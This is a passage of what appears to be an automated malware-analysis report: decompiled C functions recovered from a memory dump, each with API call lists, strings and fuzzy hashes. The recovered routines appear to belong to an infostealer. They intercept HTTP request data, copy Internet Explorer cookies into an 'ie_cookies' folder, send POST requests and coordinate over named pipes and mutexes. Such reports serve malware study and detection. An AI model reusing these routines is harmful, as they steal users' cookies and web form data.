    						goto L41;
    					}
    					if(_t145[0x404] != 0x50 || _t70 < 5) {
    						goto L55;
    					} else {
    						_v8 = 0x31;
    						if(HttpQueryInfoA(_t145[0x420], 0x80000001,  &_v72,  &_v8, 0) == 0) {
    							goto L55;
    						}
    						_t132 =  *0x412a64; // 0x246f5a8
    						_t138 = _v8;
    						if(E0040D3EC( &_v72 | 0xffffffff,  *((intOrPtr*)(_t132 + 0x11c)), _v8,  &_v72) != 0) {
    							goto L55;
    						}
    						goto L31;
    					}
    				}
    				_t143 = E0040FE8D( &_v8, __edx, _t149, _a4, 0x4e26, 0x20000000);
    				_v16 = _t143;
    				if(_t143 == 0) {
    					goto L25;
    				}
    				if(E0040D5F3(_t105, _v8) == 0) {
    					L24:
    					E0040CF40(_v16);
    					if(_v12 == 0) {
    						goto L55;
    					}
    					goto L25;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t8 = _t143 + 1; // 0x1
    					_t135 = _t8;
    					if( *_t135 == 0) {
    						goto L12;
    					}
    					_t109 =  *_t143;
    					_t128 = 0;
    					if(_t109 != 0x2d) {
    						__eflags = _t109 - 0x40;
    						if(_t109 != 0x40) {
    							__eflags = _t109 - 0x21;
    							if(_t109 != 0x21) {
    								goto L11;
    							}
    							_t128 = 1;
    							goto L10;
    						}
    						_t128 = 2;
    						goto L10;
    					} else {
    						_t128 = 3;
    						L10:
    						_t143 = _t135;
    						L11:
    						_t137 = _t143;
    						_t138 = E0040D3C6(_t143);
    						if(E00408C0D(_t143, _t110, _t145, _t145[0x400], 0, 0, 2) != 0) {
    							__eflags = _t128 - 1;
    							_v12 = (0 | _t128 != 0x00000001) & 0x0000ffff;
    							__eflags = _t128 - 3;
    							if(_t128 != 3) {
    								__eflags = _t128 - 2;
    								if(_t128 != 2) {
    									goto L24;
    								}
    								_t138 = 0x3c;
    								E0040CFFE( &_v80,  &_v80, 0, _t138);
    								_v64 =  &_v340;
    								_v80 = _t138;
    								_v60 = 0x103;
    								_t119 = InternetCrackUrlA(_t145, _t145[0x400], 0,  &_v80);
    								__eflags = _t119;
    								if(_t119 == 0) {
    									L20:
    									_t129 = 0;
    									__eflags = 0;
    									L21:
    									_t120 = 0x14;
    									 *0x41272c = _t120;
    									_t121 = E0040CF40( *0x412724);
    									__eflags = _t129;
    									if(_t129 == 0) {
    										 *0x412724 = 0;
    									} else {
    										 *0x412724 = E0040D379(_t121 | 0xffffffff, _t129);
    									}
    									goto L24;
    								}
    								__eflags = _v60;
    								if(_v60 == 0) {
    									goto L20;
    								}
    								_t129 =  &_v340;
    								goto L21;
    							}
    							E0040A193(_t137, _t138, _t145, _t145);
    							return 0;
    						}
    					}
    					L12:
    					_t143 = E0040D611(_t143, 1);
    				} while (_t143 != 0);
    				goto L24;
    			}

    APIs
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040C424
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040C4C8
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C5A6
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C5BE
    • HttpQueryInfoA.WININET(?,80000023,?,00000073,00000000), ref: 0040C5E3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
    • String ID: %SReferer: %S%SData:%S$-$1
    • API String ID: 1405552099-909787007
    • Opcode ID: 92c1cd974efd318a2f7cdd9157a088569db87c9fb5ed9542bc1bd25208fdb701
    • Instruction ID: 71a5e4bb34e465ab12082061d04cd60712991b3470c0252b202ee509c10b25b7
    • Opcode Fuzzy Hash: 92c1cd974efd318a2f7cdd9157a088569db87c9fb5ed9542bc1bd25208fdb701
    • Instruction Fuzzy Hash: 539101B0900608EADB31DBB4CCC4BEF7BB9EB45304F14867BE511B62C1D7795A868B19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040C669(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
    				signed int _v8;
    				void* __edi;
    				void* __esi;
    				signed int _t31;
    				long _t32;
    				DWORD* _t36;
    				void _t38;
    				signed int _t40;
    				signed int _t43;
    				signed int _t44;
    				intOrPtr _t45;
    				signed int _t47;
    				signed int _t55;
    				DWORD* _t58;
    				signed int _t64;
    				char* _t67;
    				void* _t72;
    
    				_t64 = __edx;
    				_t61 = __ecx;
    				_push(__ecx);
    				_t67 = __eax;
    				_t58 = __eax + 0x400;
    				 *_t58 = 0x3fc;
    				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
    					L21:
    					_t31 = 0;
    					__eflags = 0;
    					L22:
    					return _t31;
    				}
    				_t32 =  *_t58;
    				if(_t32 <= 8) {
    					goto L21;
    				}
    				 *((char*)(_t32 + _t67)) = 0;
    				 *0x412dd4(0x412e1c);
    				E0040AF73(_t67,  *_t58);
    				 *0x412dd8(0x412e1c);
    				_t36 = _t67 + 0x410;
    				_t72 = _t67 + 0x404;
    				 *_t36 = 9;
    				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
    					goto L21;
    				}
    				_t38 =  *_t72;
    				if(_t38 == 0x47) {
    					L5:
    					if(E004077D0(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
    						_t40 = E004039A2(_t61);
    						__eflags = _t40;
    						_v8 = _t40;
    						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
    						 *(_t67 + 0x420) = _a4;
    						_t43 = _a12;
    						 *((intOrPtr*)(_t67 + 0x42c)) = 0;
    						 *((intOrPtr*)(_t67 + 0x428)) = 0;
    						__eflags = _t43;
    						if(_t43 == 0) {
    							L11:
    							 *(_t67 + 0x41c) = 0;
    							 *(_t67 + 0x418) = 0;
    							L12:
    							_t44 = E0040C32A(_t64, _t67, _v8);
    							__eflags = _t44;
    							if(_t44 == 0) {
    								goto L6;
    							}
    							_t45 =  *0x412a64; // 0x246f5a8
    							_t63 =  *((intOrPtr*)(_t45 + 0x140));
    							_t65 = E0040D3C6( *((intOrPtr*)(_t45 + 0x140)));
    							_t47 = E00408C0D( *((intOrPtr*)(_t45 + 0x140)), _t46, _t67,  *_t58, 0, 0, 0);
    							__eflags = _t47;
    							if(_t47 != 0) {
    								_t55 = E0040D0D5( *_t58, _t67);
    								__eflags = _t55;
    								if(_t55 != 0) {
    									E0040A04D(_t63, E0040A34A, _t55);
    								}
    							}
    							__eflags =  *((char*)(_t67 + 0x414));
    							if(__eflags != 0) {
    								 *0x412dd4(0x412e1c);
    								_t60 = _v8;
    								__eflags = E0040ADF1(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040BFA6);
    								if(__eflags == 0) {
    									E0040ADF1(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040B271);
    									E0040B073(_t65, _t60, _t67);
    								} else {
    									 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000002;
    								}
    								 *0x412dd8(0x412e1c);
    								E0040CF40(_t60);
    							}
    							L7:
    							_t31 = 1;
    							goto L22;
    						}
    						_t64 = _a8;
    						__eflags = _t64;
    						if(_t64 == 0) {
    							goto L11;
    						} else {
    							 *(_t67 + 0x41c) = _t43;
    							 *(_t67 + 0x418) = _t64;
    							goto L12;
    						}
    					}
    					L6:
    					 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000004;
    					SetLastError(0x2f78);
    					goto L7;
    				}
    				_t80 = _t38 - 0x50;
    				if(_t38 != 0x50) {
    					goto L21;
    				}
    				goto L5;
    			}
    0x0040c669
    0x0040c669
    0x0040c66c
    0x0040c670
    0x0040c672
    0x0040c67f
    0x0040c68d
    0x0040c822
    0x0040c822
    0x0040c822
    0x0040c824
    0x0040c828
    0x0040c828
    0x0040c693
    0x0040c698
    0x00000000
    0x00000000
    0x0040c6a4
    0x0040c6a8
    0x0040c6b1
    0x0040c6b7
    0x0040c6bf
    0x0040c6c6
    0x0040c6d2
    0x0040c6e0
    0x00000000
    0x00000000
    0x0040c6e6
    0x0040c6ea
    0x0040c6f4
    0x0040c703
    0x0040c71e
    0x0040c725
    0x0040c727
    0x0040c72d
    0x0040c736
    0x0040c73c
    0x0040c73f
    0x0040c745
    0x0040c74b
    0x0040c74d
    0x0040c764
    0x0040c764
    0x0040c76a
    0x0040c770
    0x0040c775
    0x0040c77a
    0x0040c77c
    0x00000000
    0x00000000
    0x0040c77e
    0x0040c783
    0x0040c796
    0x0040c798
    0x0040c79d
    0x0040c79f
    0x0040c7a4
    0x0040c7a9
    0x0040c7ab
    0x0040c7b3
    0x0040c7b3
    0x0040c7ab
    0x0040c7b8
    0x0040c7bf
    0x0040c7cb
    0x0040c7d1
    0x0040c7e8
    0x0040c7ea
    0x0040c804
    0x0040c80b
    0x0040c7ec
    0x0040c7ec
    0x0040c7ec
    0x0040c811
    0x0040c818
    0x0040c818
    0x0040c717
    0x0040c717
    0x00000000
    0x0040c717
    0x0040c74f
    0x0040c752
    0x0040c754
    0x00000000
    0x0040c756
    0x0040c756
    0x0040c75c
    0x00000000
    0x0040c75c
    0x0040c754
    0x0040c705
    0x0040c705
    0x0040c711
    0x00000000
    0x0040c711
    0x0040c6ec
    0x0040c6ee
    0x00000000
    0x00000000
    0x00000000

    APIs
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040C685
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C6A8
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C6B7
    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040C6D8
    • SetLastError.KERNEL32(00002F78), ref: 0040C711
      • Part of subcall function 004039A2: CreateMutexW.KERNEL32(Function_00013468,00000000,?), ref: 004039BD
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C7CB
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C811
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
    • String ID: 809dslffsdfsdfgg
    • API String ID: 4246016607-2949297782
    • Opcode ID: eda03fbfd5d2274552fec76bbb9e35b8325dbdbcbf5ed9149d858ef5e03f37e4
    • Instruction ID: a0d78f86d9eb82c2925dd54ff855815cec7d7fda480595f3d41f086c91a33206
    • Opcode Fuzzy Hash: eda03fbfd5d2274552fec76bbb9e35b8325dbdbcbf5ed9149d858ef5e03f37e4
    • Instruction Fuzzy Hash: 1041C2B1640201FBC7249B61CD85FDB7BA9EF45754F00823AF605B72C1C77859618BAE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F9F9(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
    				long _v8;
    				struct _OVERLAPPED* _v12;
    				void _v16;
    				char _v518;
    				short _v536;
    				intOrPtr* _t28;
    				int _t35;
    				void** _t54;
    				void* _t61;
    				void* _t66;
    
    				_t28 = _a12;
    				if(_t28 != 0) {
    					 *_t28 = 0;
    				}
    				E0040CF7C( &_v536, L"\\\\.\\pipe\\", 0x12);
    				_v518 = 0;
    				E0040D08C(0xffffffff, _a4,  &_v518);
    				_a7 = 0;
    				while(1) {
    					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
    					_t61 = _t35;
    					if(_t61 != 0xffffffff) {
    						break;
    					}
    					if(_a7 == 1) {
    						L14:
    						return _t35;
    					}
    					WaitNamedPipeW( &_v536, 0xffffffff);
    					_a7 = _a7 + 1;
    				}
    				_v8 = 2;
    				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) == 0) {
    					L13:
    					_t35 = CloseHandle(_t61);
    					goto L14;
    				}
    				_v16 = _a8;
    				_v12 = 0;
    				if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || ReadFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || _v8 != 8) {
    					goto L13;
    				} else {
    					_t48 =  &(_v12->Internal);
    					if( &(_v12->Internal) != 0) {
    						_t66 = E0040CF2D(_t48);
    						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
    							L12:
    							E0040CF40(_t66);
    						} else {
    							_t54 = _a12;
    							if(_t54 != 0) {
    								 *_t54 = _t66;
    							}
    						}
    						goto L13;
    					}
    					_t66 = 0;
    					goto L12;
    				}
    			}
    0x0040f9fc
    0x0040fa0c
    0x0040fa0e
    0x0040fa0e
    0x0040fa1e
    0x0040fa28
    0x0040fa38
    0x0040fa3d
    0x0040fa63
    0x0040fa72
    0x0040fa78
    0x0040fa7d
    0x00000000
    0x00000000
    0x0040fa4b
    0x0040fae9
    0x0040faed
    0x0040faed
    0x0040fa5a
    0x0040fa60
    0x0040fa60
    0x0040fa86
    0x0040fa95
    0x0040fae2
    0x0040fae3
    0x00000000
    0x0040fae3
    0x0040fa9b
    0x0040faa9
    0x0040fab4
    0x00000000
    0x0040fad2
    0x0040fad5
    0x0040fad8
    0x0040faf5
    0x0040faf9
    0x0040fadc
    0x0040fadd
    0x0040fb17
    0x0040fb17
    0x0040fb1c
    0x0040fb1e
    0x0040fb1e
    0x0040fb1c
    0x00000000
    0x0040faf9
    0x0040fada
    0x00000000
    0x0040fada

    APIs
    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 0040FA5A
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00403914,00000000), ref: 0040FA72
    • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040FA8D
    • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAAC
    • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAC2
    • CloseHandle.KERNEL32(00000000), ref: 0040FAE3
    • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 0040FB05
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$HandleNamedPipeRead$CloseCreateStateWaitWrite
    • String ID: \\.\pipe\
    • API String ID: 223520675-91387939
    • Opcode ID: c8fe5c17bf30876f462e9769f900a7707d25c9f3800f2c9fcfa7db90d9c55780
    • Instruction ID: 0a883ac6afbc9c71e3c9addf3b5ba292e350c96f0d65484af3babfe2f78e3db4
    • Opcode Fuzzy Hash: c8fe5c17bf30876f462e9769f900a7707d25c9f3800f2c9fcfa7db90d9c55780
    • Instruction Fuzzy Hash: CC317E71A00108ABDB21DFA4DD88EEF77BCEB04314F108576B519E61C0E6749E49CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004046AA(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
    				signed int _v528;
    				short _v536;
    				intOrPtr _v540;
    				long _v544;
    				char _v545;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				void* _v556;
    				char _v557;
    				void* _v560;
    				intOrPtr _v561;
    				intOrPtr _v564;
    				long _v568;
    				signed int _t35;
    				void* _t39;
    				signed int _t55;
    				intOrPtr _t70;
    				signed int* _t71;
    				struct _GOPHER_FIND_DATAA _t73;
    
    				_t71 = __edi;
    				_t66 = __ecx;
    				_t35 = _a4 & 0x00000001;
    				_v528 = _t35;
    				if(_t35 != 0) {
    					 *_a8 =  *_a8 & 0x00000000;
    					 *__edi =  *__edi & 0x00000000;
    				}
    				_v545 = 1;
    				_t73 = E0040CF2D(0x1000);
    				_v544 = 0x1000;
    				 *_t73 = 0x50;
    				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
    				_v544 = _t39;
    				if(_t39 == 0) {
    					L14:
    					E0040CF40(_t73);
    					return _v561;
    				} else {
    					do {
    						_t81 = _v540;
    						if(_v540 == 0) {
    							__eflags = _a4 & 0x00000002;
    							if(__eflags == 0) {
    								 *0x412a60( *((intOrPtr*)(_t73 + 4)));
    							} else {
    								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
    								E00410F35(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
    							}
    							goto L10;
    						}
    						_t66 = E00404550(_t66, _t81,  *(_t73 + 8));
    						_v556 = _t66;
    						if(_t66 == 0) {
    							goto L10;
    						}
    						_v548 = E0040D3C6(_t66);
    						_t55 = E0040CEF9( *_t71 + _v548,  *_a8);
    						if(_t55 == 0) {
    							_v557 = 0;
    							E0040CF40(_v552);
    							E0040CF40( *_a8);
    							L13:
    							FindCloseUrlCache(_v560);
    							goto L14;
    						}
    						_t70 = _v548;
    						 *_a8 = _t55;
    						_t66 =  *_t71 + _t55;
    						E0040CF7C( *_t71 + _t55, _v552, _t70);
    						 *_t71 =  *_t71 + _t70;
    						E0040CF40(_v564);
    						L10:
    						_v560 = 0x1000;
    						 *_t73 = 0x50;
    						E0040CFEC(_t73, 0x1000);
    					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
    					goto L13;
    				}
    			}
    0x004046aa
    0x004046aa
    0x004046ba
    0x004046be
    0x004046c2
    0x004046c7
    0x004046ca
    0x004046ca
    0x004046d4
    0x004046de
    0x004046e6
    0x004046ef
    0x004046f5
    0x004046fb
    0x00404701
    0x004047f1
    0x004047f2
    0x00404800
    0x00404707
    0x00404707
    0x00404707
    0x0040470c
    0x0040476a
    0x0040476e
    0x0040479e
    0x00404770
    0x00404784
    0x00404794
    0x00404794
    0x00000000
    0x0040476e
    0x00404716
    0x00404718
    0x0040471e
    0x00000000
    0x00000000
    0x0040472e
    0x00404738
    0x0040473f
    0x004047d3
    0x004047d8
    0x004047e2
    0x004047e7
    0x004047eb
    0x00000000
    0x004047eb
    0x00404748
    0x0040474c
    0x00404755
    0x00404758
    0x00404761
    0x00404763
    0x004047a4
    0x004047a5
    0x004047aa
    0x004047b0
    0x004047c5
    0x00000000
    0x004047cd

    APIs
    • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 004046F5
    • PathFindFileNameW.SHLWAPI(?), ref: 00404773
    • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 00404784
    • DeleteUrlCacheEntryW.WININET(?), ref: 0040479E
    • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 004047BF
    • FindCloseUrlCache.WININET(?), ref: 004047EB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
    • String ID: cookie:$ie_cookies
    • API String ID: 468235262-2556801673
    • Opcode ID: 28270154a2a1dc988ffc64f0e58ce96469c7ffababa994f0f5b97b5cbc91b1eb
    • Instruction ID: 60296334ffd9ab9eb6bc6b232d26fe1a598f650a24ecf662e698e03cfb45d14c
    • Opcode Fuzzy Hash: 28270154a2a1dc988ffc64f0e58ce96469c7ffababa994f0f5b97b5cbc91b1eb
    • Instruction Fuzzy Hash: 3C418AB0004302EFC710AF65C881A6BBBE9AF85304F00893EF594A22E1D779D954CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D7CF(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t19;
    				void* _t21;
    				char* _t27;
    				void* _t29;
    
    				_t19 = 0x8404f300;
    				if((_a20 & 0x00000002) != 0) {
    					_t19 = 0x8444f300;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t19 = _t19 | 0x00800000;
    				}
    				_t27 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t27 = "GET";
    				}
    				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, "D8@", _t19, 0);
    				if(_t29 == 0) {
    					L12:
    					_t21 = 0;
    				} else {
    					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
    						L11:
    						InternetCloseHandle(_t29);
    						goto L12;
    					} else {
    						_a20 = 0;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L11;
    						} else {
    							_t21 = _t29;
    						}
    					}
    				}
    				return _t21;
    			}
    0x0040d7d6
    0x0040d7db
    0x0040d7dd
    0x0040d7dd
    0x0040d7e6
    0x0040d7e8
    0x0040d7e8
    0x0040d7f1
    0x0040d7f6
    0x0040d7f8
    0x0040d7f8
    0x0040d81b
    0x0040d81f
    0x0040d86b
    0x0040d86b
    0x0040d821
    0x0040d832
    0x0040d864
    0x0040d865
    0x00000000
    0x0040d834
    0x0040d843
    0x0040d846
    0x0040d855
    0x00000000
    0x0040d860
    0x0040d860
    0x0040d860
    0x0040d855
    0x0040d832
    0x0040d870

    APIs
    • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,D8@,8404F300,00000000), ref: 0040D815
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040D82A
    • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040D84D
    • InternetCloseHandle.WININET(00000000), ref: 0040D865
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: D8@$GET$HTTP/1.1$POST
    • API String ID: 3080274660-3067359840
    • Opcode ID: e43c93d82e72bb53095c878edeff0992e7ae2f60b0d798be304154a3f6562bd8
    • Instruction ID: 04fdfc17a8499267acbb4109da10659d963d894b513dad18115b36a6b09a03c2
    • Opcode Fuzzy Hash: e43c93d82e72bb53095c878edeff0992e7ae2f60b0d798be304154a3f6562bd8
    • Instruction Fuzzy Hash: 7011E7725002096ADB219FA68C08FEB3E9CEF057A9F00C036BE04E2190C778C514C7E8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406CBE(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
    				int _v12;
    				long _v16;
    				void* _v20;
    				short _v544;
    				short _v1064;
    				void* _t26;
    				void* _t41;
    				int _t44;
    				void* _t45;
    				void* _t46;
    
    				_t46 = __edi;
    				_t45 = __ecx;
    				E0040988B(__edi, _a4, 1,  &_v544);
    				E0040988B(__edi, _a4, 2,  &_v1064);
    				_t44 = 0;
    				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
    				if(_t26 == 0) {
    					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
    					if(_t26 != 0) {
    						goto L1;
    					}
    					_v20 = CreateMutexW(0x413468, 1,  &_v544);
    					if(E00406DC4(__edi, _t45, E004050C7 -  *0x412bac, 0) != 0) {
    						_a7 = 1;
    						_v16 = 0;
    						_v12 = 0;
    						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
    							if(_v16 != 0x103) {
    								L15:
    								_t44 = _a7;
    								goto L5;
    							}
    							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
    							if(_t41 != _t44) {
    								CloseHandle(_t41);
    								goto L15;
    							}
    							_v12 = _v12 + 1;
    							if(_v12 > 0x1f4) {
    								_a7 = _t44;
    								goto L15;
    							}
    							Sleep(0x14);
    						}
    						goto L15;
    					}
    					L5:
    					CloseHandle(_v20);
    					return _t44;
    				}
    				L1:
    				CloseHandle(_t26);
    				return 0;
    			}
    0x00406cbe
    0x00406cbe
    0x00406cd6
    0x00406ce8
    0x00406cf4
    0x00406cfd
    0x00406d05
    0x00406d1f
    0x00406d27
    0x00000000
    0x00000000
    0x00406d3d
    0x00406d56
    0x00406d65
    0x00406d69
    0x00406d6c
    0x00406da2
    0x00406d78
    0x00406dbf
    0x00406dbf
    0x00000000
    0x00406dbf
    0x00406d83
    0x00406d8b
    0x00406db4
    0x00000000
    0x00406db4
    0x00406d90
    0x00406d98
    0x00406dbc
    0x00000000
    0x00406dbc
    0x00406d9c
    0x00406d9c
    0x00000000
    0x00406db1
    0x00406d58
    0x00406d5b
    0x00000000
    0x00406d61
    0x00406d07
    0x00406d08
    0x00000000

    APIs
      • Part of subcall function 0040988B: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00404E18,00000002,?), ref: 004098A4
      • Part of subcall function 0040988B: wnsprintfW.SHLWAPI ref: 004098C6
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00406CFD
    • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D08
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00406D1F
    • CreateMutexW.KERNEL32(Function_00013468,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 00406D37
    • CloseHandle.KERNEL32(?,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D5B
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D83
    • Sleep.KERNEL32(00000014,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406D9C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00406DA7
    • CloseHandle.KERNEL32(00000000,?,?,-0000DAE5,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00406DB4
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
    • String ID:
    • API String ID: 3355469312-0
    • Opcode ID: e83a6fb2344689a7cd6f414c0b15b10d2d4ee043fa65e0216b4943fa35335559
    • Instruction ID: 8873707bb9d8a888399207ea181069b1cb2372e6ed3b396ed993ab727a1a7baa
    • Opcode Fuzzy Hash: e83a6fb2344689a7cd6f414c0b15b10d2d4ee043fa65e0216b4943fa35335559
    • Instruction Fuzzy Hash: 283181B1600108BFDB109FA0DD84AEE7BBCEF05344F508076F606F2181D7788E558B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E00409725(short* __edx) {
    				long _v8;
    				char _v12;
    				short _v112;
    				short _v632;
    				signed char _t32;
    				long _t39;
    				intOrPtr _t41;
    				long _t44;
    				intOrPtr _t48;
    				unsigned int _t50;
    				long _t54;
    				intOrPtr _t60;
    				long _t63;
    				void* _t67;
    				short* _t70;
    				void* _t73;
    				CHAR* _t74;
    
    				_t70 = __edx;
    				_t32 =  *0x412af8; // 0x0
    				asm("sbb esi, esi");
    				_v8 = 0x206;
    				_t73 =  ~(_t32 & 1) + 0x80000002;
    				E0040CFFE( &_v632,  &_v632, 0, 0x208);
    				if(__edx == 0xffffffff) {
    					L9:
    					_v8 = 0x31;
    					if(GetComputerNameW( &_v112,  &_v8) == 0) {
    						lstrcpyW( &_v112, L"unknown");
    					}
    					_t39 = GetTickCount();
    					_t41 =  *0x412a64; // 0x246f5a8
    					_t44 = wnsprintfW( &_v632, 0x103,  *(_t41 + 0x58),  &_v112, _t39) + _t43;
    					L12:
    					_v8 = _t44 + 2;
    					_t48 =  *0x412a64; // 0x246f5a8
    					E004075A2(_t73,  *((intOrPtr*)(_t48 + 0x34)),  *((intOrPtr*)(_t48 + 0x38)), 1,  &_v632, _t44 + 2);
    					_t50 = _v8;
    					L13:
    					_v8 = (_t50 >> 1) - 1;
    					_t74 = E0040D312((_t50 >> 1) - 1,  &_v632);
    					_t54 = CharLowerBuffA(_t74, _v8);
    					_t67 = 0;
    					if(_v8 <= 0) {
    						L20:
    						 *0x412c14 = _t74;
    						return _t54;
    					} else {
    						goto L14;
    					}
    					do {
    						L14:
    						_t54 =  *((intOrPtr*)(_t67 + _t74));
    						if(_t54 < 0x61 || _t54 > 0x7a) {
    							if(_t54 < 0x30 || _t54 > 0x39) {
    								 *((char*)(_t67 + _t74)) = 0x5f;
    							}
    						}
    						_t67 = _t67 + 1;
    					} while (_t67 < _v8);
    					goto L20;
    				}
    				if(__edx == 0 ||  *__edx == 0) {
    					_t60 =  *0x412a64; // 0x246f5a8
    					if(E00407559(_t73,  *((intOrPtr*)(_t60 + 0x34)),  *((intOrPtr*)(_t60 + 0x38)),  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
    						_t50 = _v8;
    						if(_t50 > 4) {
    							goto L13;
    						}
    					}
    					goto L9;
    				} else {
    					_t63 = E0040D3D8(__edx) + _t62;
    					_v8 = _t63;
    					if(_t63 >= 0x204) {
    						_t63 = 0x204;
    					}
    					E0040CF7C( &_v632, _t70, _t63);
    					_t44 = _v8;
    					goto L12;
    				}
    			}
    0x00409725
    0x0040972e
    0x00409748
    0x0040974b
    0x00409752
    0x00409758
    0x00409760
    0x004097cb
    0x004097d3
    0x004097e2
    0x004097ed
    0x004097ed
    0x004097f3
    0x004097fe
    0x0040981b
    0x0040981d
    0x00409820
    0x0040982a
    0x00409838
    0x0040983d
    0x00409840
    0x0040984a
    0x00409855
    0x00409858
    0x0040985e
    0x00409863
    0x00409882
    0x00409882
    0x0040988a
    0x00000000
    0x00000000
    0x00000000
    0x00409865
    0x00409865
    0x00409865
    0x0040986a
    0x00409872
    0x00409878
    0x00409878
    0x00409872
    0x0040987c
    0x0040987d
    0x00000000
    0x00409865
    0x00409764
    0x004097a8
    0x004097bb
    0x004097c3
    0x004097c9
    0x00000000
    0x00000000
